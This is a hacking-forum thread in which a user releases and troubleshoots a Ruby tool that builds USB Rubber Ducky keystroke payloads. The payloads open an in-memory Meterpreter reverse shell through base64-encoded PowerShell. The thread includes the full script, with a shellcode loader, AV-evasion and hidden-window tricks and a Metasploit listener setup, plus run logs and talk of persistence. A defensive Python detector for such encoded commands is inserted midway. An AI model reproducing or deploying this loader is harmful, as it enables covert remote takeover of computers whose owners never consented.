b00stfr3ak Posted August 19, 2013 (edited)

Hey, I created a script that will create a reverse meterpreter connection all in memory using powershell. This is the same attack that SET uses with the teensy board, so I thought I would bring it over to the ducky. The code is at https://github.com/b00stfr3ak/Powershell-Reverse-Rubber-Ducky

Seems like github has messed with the formatting a little but shouldn't be a problem. Try it out and let me know what you guys think.

EDIT: Added what the script looks like when run.

    ruby reverse_powershell_ducky.rb
    [!] Enter the host ip to listen on: 192.168.1.1
    [+] Using 192.168.1.1 as server
    [!] Enter the port you would like to use or leave blank for [443]: 8080
    [+] Using 8080
    [*] Generating shellcode
    [*] Writing to file
    [+] File Complete
    [!] Would you like to start the listener?[yes/no] no
    [*] Compile powershell_reverse_ducky.txt with duckencode.jar
    [*] Good Bye!

or

    ruby reverse_powershell_ducky.rb
    [!] Enter the host ip to listen on: 192.168.1.1
    [+] Using 192.168.1.1 as server
    [!] Enter the port you would like to use or leave blank for [443]:
    [+] Using 443
    [*] Generating shellcode
    [*] Writing to file
    [+] File Complete
    [!] Would you like to start the listener?[yes/no] yes
    [*] Compile powershell_reverse_ducky.txt with duckencode.jar
    [*] Setting up Metasploit this may take a moment

Edited August 20, 2013 by b00stfr3ak

Darren Kitchen Posted August 19, 2013

Sweet script! Did you try out the Simple Ducky Payload Generator? https://forums.hak5.org/index.php?/topic/28969-release-simple-ducky-payload-generator-v111-international-key-mappingkali-compatiblecustom-payload-builder/

I'm not sure if it uses the same technique but it's another great resource.

overwraith Posted August 19, 2013

I've never used ruby before, I ran the script, now I don't know where the script dumped the file to. Am I looking for a .txt, or a .bin?

no42 Posted August 20, 2013

should be called: powershell_reverse_ducky.txt

overwraith Posted August 20, 2013 (edited)

I've also never used metasploit before, which is why I didn't know that I would have needed it to run this script. At least I now know what went wrong, I will fix my error promptly.

    J:\Powershell-Reverse-Rubber-Ducky-master>reverse_powershell_ducky.rb
    [!] Enter the host ip to listen on: 192.168.1.1
    [+] Using 192.168.1.1 as server
    [!] Enter the port you would like to use or leave blank for [443]: 8080
    [+] Using 8080
    [*] Generating shellcode
    J:/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in ``': No such file or directory - /opt/metasploit-framework/./msfvenom --payload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8080 C (Errno::ENOENT)
            from J:/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in `shellcode_gen'
            from J:/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:83:in `<main>'
    J:\Powershell-Reverse-Rubber-Ducky-master>

Edited August 20, 2013 by overwraith

b00stfr3ak (Author) Posted August 20, 2013 (edited)

> Sweet script! Did you try out the Simple Ducky Payload Generator? https://forums.hak5.org/index.php?/topic/28969-release-simple-ducky-payload-generator-v111-international-key-mappingkali-compatiblecustom-payload-builder/ I'm not sure if it uses the same technique but it's another great resource.

Looks like they use vb to create an exe and execute that, which may be caught by av when created. But anyways it was fun writing it. I have something planned that I hope to release this weekend.

Edited August 20, 2013 by b00stfr3ak

Darren Kitchen Posted August 20, 2013

What technique are you using to drop the shell?

b00stfr3ak (Author) Posted August 20, 2013

The script takes a powershell command with meterpreter shellcode and base64 encodes it. From there the ducky launches cmd, and then powershell -encodedCommand (payload) directly into memory. This bypasses all AV.

The powershell technique was created by Matthew Graeber http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html

The downgrade from x64 to x86 for powershell was created by Dave Kennedy https://www.trustedsec.com/may-2013/native-powershell-x86-shellcode-injection-on-64-bit-platforms/

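For defenders, the encoding step described in the post above is reversible from any logged process command line. The following is an added example, not part of the original thread or the author's script: it decodes `-enc` arguments and checks the result for the API names the posted loader uses. The sample command lines are constructed and carry no shellcode; the function names and verdict labels are assumptions of this example.

```python
import base64
import binascii

# API and path names the loader in this thread contains once decoded.
INDICATORS = ("DllImport", "VirtualAlloc", "CreateThread", "memset",
              "Add-Type", "syswow64")


def _is_param(token, full_name, min_len):
    """PowerShell accepts abbreviated parameter names (-enc, -nop, -w)."""
    if token[0] not in "-/" or len(token) - 1 < min_len:
        return False
    return full_name.startswith(token[1:].lower())


def decode_encoded_command(b64_text):
    """Return the script behind -EncodedCommand (Base64 of UTF-16LE)."""
    try:
        return base64.b64decode(b64_text, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # not valid Base64, or not UTF-16LE text


def analyze(cmdline):
    """Classify one logged process command line."""
    tokens = cmdline.split()
    flags, decoded = set(), None
    for i, tok in enumerate(tokens):
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if _is_param(tok, "noprofile", 3):
            flags.add("NoProfile")
        elif _is_param(tok, "noninteractive", 4):
            flags.add("NonInteractive")
        elif _is_param(tok, "windowstyle", 1) and nxt.lower() == "hidden":
            flags.add("WindowStyle Hidden")
        elif (_is_param(tok, "encodedcommand", 1)
              or tok.lower() in ("-ec", "/ec")):
            flags.add("EncodedCommand")
            decoded = decode_encoded_command(nxt)
    text = (decoded or "").lower()
    hits = [name for name in INDICATORS if name.lower() in text]
    if {"DllImport", "VirtualAlloc", "CreateThread"} <= set(hits):
        verdict = "shellcode-loader-pattern"
    elif "EncodedCommand" in flags:
        verdict = "encoded-command"
    else:
        verdict = "no-encoded-command"
    return {"flags": sorted(flags), "decoded": decoded,
            "indicators": hits, "verdict": verdict}


def _enc(script):
    """Encode a script the way -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: the stub keeps the thread's API names, no payload bytes.
LOADER_STUB = (
    "$c = '[DllImport(\"kernel32.dll\")]public static extern IntPtr "
    "VirtualAlloc(IntPtr a, uint b, uint c, uint d);"
    "[DllImport(\"kernel32.dll\")]public static extern IntPtr "
    "CreateThread(IntPtr a, uint b, IntPtr c, IntPtr d, uint e, IntPtr f);';"
    "$w = Add-Type -memberDefinition $c -Name 'Win32' -passthru"
)
SAMPLES = {
    "ducky": "powershell -nop -wind hidden -noni -enc " + _enc(LOADER_STUB),
    "admin": "powershell.exe -NoProfile -EncodedCommand " + _enc("Get-Date"),
    "plain": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
    "broken": "powershell -e not_base64!!",
}

if __name__ == "__main__":
    for name, line in SAMPLES.items():
        result = analyze(line)
        print(name, result["verdict"], result["flags"], result["indicators"])
```

Run it over the command-line field of process-creation events; the child process started by the x64-to-x86 downgrade carries its own `-enc` argument and decodes the same way.
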
TeCHemically Posted August 28, 2013

Great script, I am super excited to test this one out :D One problem though for me so far. Just like overwraith's issue. I have metasploit fully updated as of less than 5 minutes ago from the time of this post and have postgresql and metasploit services started. I am still getting the below error:

    [*] Generating shellcode
    /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in ``': No such file or directory - /opt/metasploit-framework/./msfvenom --payload windows/meterpreter/reverse_tcp LHOST=71.81.200.174 LPORT=443 C (Errno::ENOENT)
            from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in `shellcode_gen'
            from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:83:in `<main>'

Do I need to have the msfconsole up? Why am I getting this error? Thanks to all who reply! :)

b00stfr3ak (Author) Posted August 28, 2013

Hey thanks for trying it out. I have updated the script to support default Kali install. If you are still having issues please let me know.

TeCHemically Posted August 29, 2013 (edited)

No, thank you for taking the time to produce this! I ran it this morning and all appears well. What directory does the txt file get created in?... Never mind, I found it in home directory. Thanks again! :)

Edited August 29, 2013 by TeCHemically

411Hall Posted August 30, 2013

Awesome script dude, I also had no idea about the encodedCommand cmdlet. Think I have some changes to make to the DuckToolkit!

TeCHemically Posted August 30, 2013 (edited)

> Hey thanks for trying it out. I have updated the script to support default Kali install. If you are still having issues please let me know.

Everything appears to have been successful on the client side; but I don't get the shell on my VPS. I am using other 443 meterpreter reverse shells in the same environment successfully so I know it is not a network issue.

EDIT: re-ran everything and now all is well. Great job!! If only there was a way to make this persistent.

Edited August 30, 2013 by TeCHemically

b00stfr3ak (Author) Posted September 1, 2013

Yeah, it all depends on what priv you ran the script under, so UAC could be added and from there you could do whatever you wanted to the system.

DrDinosaur Posted September 13, 2013

Great script! I made a video showing it off:

b00stfr3ak (Author) Posted September 18, 2013

Nice video! What do you use to record? Check out the Ducky Tool Kit I made https://forums.hak5.org/index.php?/topic/30333-power-ducky-toolkit/

DrDinosaur Posted September 20, 2013

I used Camtasia. And nice toolkit there :)

TeCHemically Posted April 15, 2014 (edited)

This script is now failing in Kali. I have tried on 2 separate installs that are up to date and get the following error:

    [*] Generating shellcode
    No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    No Arch selected, selecting Arch: x86 from the payload
    Found 0 compatible encoders
    reverse_powershell_ducky.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError)
            from reverse_powershell_ducky.rb:51:in `clean_shellcode'
            from reverse_powershell_ducky.rb:45:in `shellcode_gen'
            from reverse_powershell_ducky.rb:90:in `<main>'

Any help is greatly appreciated as this is my go-to method in testing due to its AV evasion ability.

Also, would it be possible to have this script accept domain names as well as IP addresses?

Edited April 15, 2014 by TeCHemically

b00stfr3ak (Author) Posted May 3, 2014

Sorry, haven't checked this in a long time. I'll try to take a look tonight, should be simple. Take a look at https://forums.hak5.org/index.php?/topic/30333-power-ducky-toolkit/ for the time being, fast meterpreter is the same concept but finishes in seconds. I plan on rewriting that because the code is real bad.

Does the script fail with DNS names? It should just pass everything to metasploit.

MB60893 Posted May 10, 2014

Looks like I'll have to get back into some metasploit work!

b00stfr3ak (Author) Posted May 11, 2014

I have fixed the issue with msfvenom, let me know if you run into any more issues.

Haxineer1337 Posted May 24, 2014

Can't we just use a downloader and a batch file? Also, if we use a remote ip can we get remote access?

SystemCrash86 Posted May 25, 2014

Ducky reverse shell doesn't work

I have used the following script, that I know used to work and now doesn't. I modified it a bit from the original download to hide the cmd window as the shellcode is being typed. It worked like a charm but now it's not working. Here is the script:

    #!/usr/bin/env ruby
    # Thanks to @mattifestation exploit-monday.com and Dave Kennedy.
    # Written by James Cook @b00stfr3ak44
    require 'base64'
    def print_error(text)
      print "\e[31m[-]\e[0m #{text}"
    end
    def print_success(text)
      print "\e[32m[+]\e[0m #{text}"
    end
    def print_info(text)
      print "\e[34m[*]\e[0m #{text}"
    end
    def get_input(text)
      print "\e[33m[!]\e[0m #{text}"
    end
    def get_host()
      host_name = [(get_input("Enter the host ip to listen on: ") ), $stdin.gets.rstrip][1]
      ip = host_name.split('.')
      if ip[0] == nil or ip[1] == nil or ip[2] == nil or ip[3] == nil
        print_error("Not a valid IP\n")
        get_host()
      end
      print_success("Using #{host_name} as server\n")
      return host_name
    end
    def get_port()
      port = [(get_input("Enter the port you would like to use or leave blank for [443]: ") ), $stdin.gets.rstrip][1]
      if port == ''
        port = '443'
        print_success("Using #{port}\n")
        return port
      elsif not (1..65535).cover?(port.to_i)
        print_error("Not a valid port\n")
        sleep(1)
        port()
      else
        print_success("Using #{port}\n")
        return port
      end
    end
    def shellcode_gen(msf_path,host,port)
      print_info("Generating shellcode\n")
      execute = `#{msf_path}./msfvenom --payload #{@set_payload} LHOST=#{host} LPORT=#{port} C`
      shellcode = clean_shellcode(execute)
      powershell_command = %($1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = #{shellcode};$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\\syswow64\\WindowsPowerShell\\v1.0\\powershell";$cmd = "-nop -noni -enc";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";})
      encoded_command = Base64.encode64(powershell_command.encode("utf-16le")).delete("\r\n")
      return encoded_command
    end
    def clean_shellcode(shellcode)
      shellcode = shellcode.gsub('\\',",0")
      shellcode = shellcode.delete("+")
      shellcode = shellcode.delete('"')
      shellcode = shellcode.delete("\n")
      shellcode = shellcode.delete("\s")
      shellcode[0..4] = ''
      return shellcode
    end
    def ducky_setup(encoded_command)
      print_info("Writing to file\n")
      File.open("powershell_reverse_ducky.txt",'w') {|f| f.write("DELAY 2000\nGUI r\nDELAY 500\nSTRING cmd /Q /D /T:7F /F:OFF /V:ON /K\nDELAY 500\nENTER\nDELAY 750\nALT SPACE\nSTRING M\nDOWNARROW\nREPEAT 100\nENTER\nSTRING powershell -nop -wind hidden -noni -enc #{encoded_command}\nENTER")}
      print_success("File Complete\n")
    end
    def metasploit_setup(msf_path,host,port)
      print_info("Setting up Metasploit this may take a moment\n")
      rc_file = "msf_listener.rc"
      file = File.open("#{rc_file}",'w')
      file.write("use exploit/multi/handler\n")
      file.write("set PAYLOAD #{@set_payload}\n")
      file.write("set LHOST #{host}\n")
      file.write("set LPORT #{port}\n")
      file.write("set EnableStageEncoding true\n")
      file.write("set ExitOnSession false\n")
      file.write("exploit -j")
      file.close
      system("#{msf_path}./msfconsole -r #{rc_file}")
    end
    begin
      if File.exist?('/usr/bin/msfvenom')
        msf_path = '/usr/bin/'
      elsif File.exist?("/opt/metasploit-framework/msfvenom")
        msf_path = ('/opt/metasploit-framework/')
      else
        print_error("Metasploit Not Found!")
        exit
      end
      @set_payload = "windows/meterpreter/reverse_tcp"
      host = get_host()
      port = get_port()
      encoded_command = shellcode_gen(msf_path,host,port)
      ducky_setup(encoded_command)
      msf_setup = [(get_input("Would you like to start the listener?[yes/no] ") ), $stdin.gets.rstrip][1]
      print_info("Compile powershell_reverse_ducky.txt with duckencode.jar\n")
      metasploit_setup(msf_path,host,port) if msf_setup == 'yes'
      print_info("Good Bye!\n")
    end

And I get the following error:

    root@SystemCrash86:/usr/share/simple-ducky/payloads# ./reverse_powershell_ducky2.rb
    [!] Enter the host ip to listen on: 192.168.0.2
    [+] Using 192.168.0.2 as server
    [!] Enter the port you would like to use or leave blank for [443]: 443
    [+] Using 443
    [*] Generating shellcode
    No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    No Arch selected, selecting Arch: x86 from the payload
    Found 0 compatible encoders
    ./reverse_powershell_ducky2.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError)
            from ./reverse_powershell_ducky2.rb:51:in `clean_shellcode'
            from ./reverse_powershell_ducky2.rb:45:in `shellcode_gen'
            from ./reverse_powershell_ducky2.rb:90:in `<main>'
    root@SystemCrash86:/usr/share/simple-ducky/payloads#

Everything is up to date and this script used to work but now I get those errors.

b00stfr3ak (Author) Posted May 27, 2014 (edited)

Please do a git pull or just re-clone the repo; this was fixed last week.

> Can't we just use a downloader and a batch file? Also, if we use a remote ip can we get remote access?

Not sure what you are asking. This holds the psh script on a web server, downloads it in memory and executes it on the machine.

Edited May 27, 2014 by b00stfr3ak

SystemCrash86 Posted May 27, 2014

I did a fresh clean install of Simple-Ducky Payload Generator. Then I used git clone on https://github.com/b00stfr3ak/Powershell-Reverse-Rubber-Ducky.git to get the reverse_powershell_ducky.rb. Note that everything is up to date and freshly installed and that this script has been cloned from GitHub and I have not made any changes to this one. This script also worked flawlessly on Kali linux 3.12-kali1-amd64 iso without problems but since the update to 3.14-kali1-amd64 it no longer works.

    root@SystemCrash86:/usr/share/simple-ducky# ./update.sh
    Already up-to-date.
    Entering 'misc/dbd'
    Switched to branch 'master'
    Entering 'misc/dbd'
    Already up-to-date.
    # On branch master
    nothing to commit (working directory clean)
    root@SystemCrash86:~/Powershell-Reverse-Rubber-Ducky# ./reverse_powershell_ducky.rb
    Enter the host ip to listen on: 192.168.0.2
    [+] Using 192.168.0.2 as server
    Port you would like to use or leave blank for [443]:
    [+] Using 443
    [*] Generating shellcode
    No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    No Arch selected, selecting Arch: x86 from the payload
    Found 0 compatible encoders
    [*] Writing to file
    [+] File Complete
    Would you like to start the listener?[yes/no] yes
    [*] Compile powershell_reverse_ducky.txt with duckencode.jar
    [*] Setting up Metasploit this may take a moment
    http://metasploit.pro
    Validate lots of vulnerabilities to demonstrate exposure
    with Metasploit Pro -- Learn more on http://rapid7.com/metasploit
    =[ metasploit v4.9.2-2014052101 [core:4.9 api:1.0] ]
    + -- --=[ 1311 exploits - 784 auxiliary - 221 post ]
    + -- --=[ 335 payloads - 35 encoders - 8 nops ]
    + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
    [*] Processing msf_listener.rc for ERB directives.
    resource (msf_listener.rc)> use exploit/multi/handler
    resource (msf_listener.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (msf_listener.rc)> set LHOST 192.168.0.2
    LHOST => 192.168.0.2
    resource (msf_listener.rc)> set LPORT 443
    LPORT => 443
    resource (msf_listener.rc)> set EnableStageEncoding true
    EnableStageEncoding => true
    resource (msf_listener.rc)> set ExitOnSession false
    ExitOnSession => false
    resource (msf_listener.rc)> exploit -j
    [-] Exploit failed: undefined method `const_defined?' for nil:NilClass
    msf exploit(handler) >
